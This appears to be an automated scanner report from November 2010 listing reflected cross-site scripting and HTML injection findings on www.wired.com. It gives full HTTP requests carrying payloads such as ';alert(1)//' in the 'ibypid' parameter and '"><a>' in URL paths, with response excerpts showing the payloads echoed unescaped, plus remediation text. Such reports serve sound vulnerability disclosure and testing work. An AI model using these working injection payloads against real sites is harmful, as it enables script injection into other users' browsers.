Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/07/must-sees/?ibypid=453f8c%3balert(1)//63f97596e7a HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.6 X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php Last-Modified: Sun, 21 Nov 2010 23:14:18 GMT Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=480 Expires: Sun, 21 Nov 2010 23:22:18 GMT Date: Sun, 21 Nov 2010 23:14:18 GMT Connection: close Connection: Transfer-Encoding Content-Length: 103981
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 453f8c;alert(1)//63f97596e7a;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 985e3%3balert(1)//29173f1a6e4 was submitted in the ibypid parameter. This input was echoed as 985e3;alert(1)//29173f1a6e4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/07/the-list?ibypid=3985e3%3balert(1)//29173f1a6e4 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.6 X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php Last-Modified: Sun, 21 Nov 2010 23:14:17 GMT Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=480 Expires: Sun, 21 Nov 2010 23:22:17 GMT Date: Sun, 21 Nov 2010 23:14:17 GMT Connection: close Connection: Transfer-Encoding Content-Length: 104027
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 3985e3;alert(1)//29173f1a6e4;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9281f%3balert(1)//1442148a2f4 was submitted in the ibypid parameter. This input was echoed as 9281f;alert(1)//1442148a2f4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/07/tweetcarts?ibypid=19281f%3balert(1)//1442148a2f4 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.6 X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php Last-Modified: Sun, 21 Nov 2010 23:14:09 GMT Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=447 Expires: Sun, 21 Nov 2010 23:21:37 GMT Date: Sun, 21 Nov 2010 23:14:10 GMT Connection: close Connection: Transfer-Encoding Content-Length: 102331
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 19281f;alert(1)//1442148a2f4;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a7a08%3balert(1)//72fe6adb542 was submitted in the ibypid parameter. This input was echoed as a7a08;alert(1)//72fe6adb542 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/08/english-japanese-emoticon-translator/?ibypid=6a7a08%3balert(1)//72fe6adb542 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.6 X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php Last-Modified: Sun, 21 Nov 2010 23:14:28 GMT Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=446 Expires: Sun, 21 Nov 2010 23:21:55 GMT Date: Sun, 21 Nov 2010 23:14:29 GMT Connection: close Connection: Transfer-Encoding Content-Length: 109190
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 6a7a08;alert(1)//72fe6adb542;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 67c96%3balert(1)//9c87be7eadf was submitted in the ibypid parameter. This input was echoed as 67c96;alert(1)//9c87be7eadf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/08/top-ten-most-popular-celebrities/?ibypid=767c96%3balert(1)//9c87be7eadf HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.6 X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php Last-Modified: Sun, 21 Nov 2010 23:14:24 GMT Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=480 Expires: Sun, 21 Nov 2010 23:22:24 GMT Date: Sun, 21 Nov 2010 23:14:24 GMT Connection: close Connection: Transfer-Encoding Content-Length: 107186
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 767c96;alert(1)//9c87be7eadf;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f56c8%3balert(1)//bb7f19b9979 was submitted in the ibypid parameter. This input was echoed as f56c8;alert(1)//bb7f19b9979 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/09/ascent-of-robot/?ibypid=9f56c8%3balert(1)//bb7f19b9979 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.6 X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php Last-Modified: Sun, 21 Nov 2010 23:14:39 GMT Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=480 Expires: Sun, 21 Nov 2010 23:22:39 GMT Date: Sun, 21 Nov 2010 23:14:39 GMT Connection: close Connection: Transfer-Encoding Content-Length: 105063
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 9f56c8;alert(1)//bb7f19b9979;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c43e3%3balert(1)//d95607fec28 was submitted in the ibypid parameter. This input was echoed as c43e3;alert(1)//d95607fec28 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/09/bittorrent-or-box-office/?ibypid=11c43e3%3balert(1)//d95607fec28 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.6 X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php Last-Modified: Sun, 21 Nov 2010 23:14:35 GMT Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=449 Expires: Sun, 21 Nov 2010 23:22:04 GMT Date: Sun, 21 Nov 2010 23:14:35 GMT Connection: close Connection: Transfer-Encoding Content-Length: 107877
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 11c43e3;alert(1)//d95607fec28;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1b488%3balert(1)//92eb5cb2444 was submitted in the ibypid parameter. This input was echoed as 1b488;alert(1)//92eb5cb2444 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/09/re-animators/?ibypid=101b488%3balert(1)//92eb5cb2444 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.6 X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php Last-Modified: Sun, 21 Nov 2010 23:14:39 GMT Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=467 Expires: Sun, 21 Nov 2010 23:22:26 GMT Date: Sun, 21 Nov 2010 23:14:39 GMT Connection: close Connection: Transfer-Encoding Content-Length: 110658
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 101b488;alert(1)//92eb5cb2444;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8030b%3balert(1)//54f8fbfd62 was submitted in the ibypid parameter. This input was echoed as 8030b;alert(1)//54f8fbfd62 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/09/the-molecular-pantry/?ibypid=88030b%3balert(1)//54f8fbfd62 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.6 X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php Last-Modified: Sun, 21 Nov 2010 23:14:35 GMT Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=480 Expires: Sun, 21 Nov 2010 23:22:35 GMT Date: Sun, 21 Nov 2010 23:14:35 GMT Connection: close Connection: Transfer-Encoding Content-Length: 104883
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 88030b;alert(1)//54f8fbfd62;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload dc247%3balert(1)//401a89ca126 was submitted in the ibypid parameter. This input was echoed as dc247;alert(1)//401a89ca126 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/10/buy-it-or-burn-it?ibypid=12dc247%3balert(1)//401a89ca126 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.6 X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php Last-Modified: Sun, 21 Nov 2010 23:13:45 GMT Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=438 Expires: Sun, 21 Nov 2010 23:21:03 GMT Date: Sun, 21 Nov 2010 23:13:45 GMT Connection: close Connection: Transfer-Encoding Content-Length: 105655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 12dc247;alert(1)//401a89ca126;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 99586%3balert(1)//29128e720c6 was submitted in the ibypid parameter. This input was echoed as 99586;alert(1)//29128e720c6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/10/peak-everything?ibypid=1399586%3balert(1)//29128e720c6 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.6 X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php Last-Modified: Sun, 21 Nov 2010 23:14:02 GMT Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=480 Expires: Sun, 21 Nov 2010 23:22:02 GMT Date: Sun, 21 Nov 2010 23:14:02 GMT Connection: close Connection: Transfer-Encoding Content-Length: 113826
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 1399586;alert(1)//29128e720c6;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8c5cb%3balert(1)//5e37e52b0bb was submitted in the ibypid parameter. This input was echoed as 8c5cb;alert(1)//5e37e52b0bb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/10/turkeys-and-triumphs?ibypid=148c5cb%3balert(1)//5e37e52b0bb HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.6 X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php Last-Modified: Sun, 21 Nov 2010 23:13:43 GMT Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=480 Expires: Sun, 21 Nov 2010 23:21:43 GMT Date: Sun, 21 Nov 2010 23:13:43 GMT Connection: close Connection: Transfer-Encoding Content-Length: 107511
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 148c5cb;alert(1)//5e37e52b0bb;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload bc9b9%3balert(1)//3b7177fe795 was submitted in the ibypid parameter. This input was echoed as bc9b9;alert(1)//3b7177fe795 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/11/avoiding-bad-holiday-albums?ibypid=15bc9b9%3balert(1)//3b7177fe795 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.6 X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php Last-Modified: Sun, 21 Nov 2010 23:13:40 GMT Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=480 Expires: Sun, 21 Nov 2010 23:21:40 GMT Date: Sun, 21 Nov 2010 23:13:40 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106915
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 15bc9b9;alert(1)//3b7177fe795;</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e89c"><a>d3ad9ae676c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /medtech8e89c"><a>d3ad9ae676c HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29378 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:15:03 GMT Date: Mon, 22 Nov 2010 01:11:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_medtech8e89c"><a>d3ad9ae676c"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41041"><a>c86672fee37 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /medtech41041"><a>c86672fee37/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29379 Vary: Accept-Encoding Cache-Control: max-age=220 Expires: Sun, 21 Nov 2010 20:19:52 GMT Date: Sun, 21 Nov 2010 20:16:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_medtech41041"><a>c86672fee37"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6c78"><a>e49d3eb099e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /medtechc6c78"><a>e49d3eb099e/drugs HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29393 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:12:38 GMT Date: Sun, 21 Nov 2010 23:08:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_medtechc6c78"><a>e49d3eb099e ss_drugs"> ...[SNIP]...
